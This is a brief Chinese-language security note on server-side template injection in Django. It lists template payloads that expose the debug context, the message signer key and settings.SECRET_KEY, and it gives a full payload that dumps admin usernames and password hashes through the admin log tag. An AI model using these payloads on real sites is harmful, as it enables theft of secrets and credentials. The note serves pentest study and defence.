Django SSTI

Django好像没见任意命令执行漏洞，但有几个很危险的用法

{{ ‘’ }} {{ ‘’ | safe }} css

{% debug %} Django的{% debug %}标签主要在开发环境中使用。当在模板中插入该标签时，它会输出详细的调试信息，帮助你理解当前模板上下文的状态。

[!CAUTION] 会暴露大量敏感信息。

根据暴露的object可以查看一些敏感的属性，如： {{ messages.storages.0.signer.key }} {{settings.SECRET_KEY}}

{% include ‘admin/base.html’ %} 甚至还有include

Admin username & password hash leak (assumes admin_log records exist): {% load log %}{% get_admin_log 10 as log %}{% for e in log %} {{e.user.get_username}} : {{e.user.password}}{% endfor %}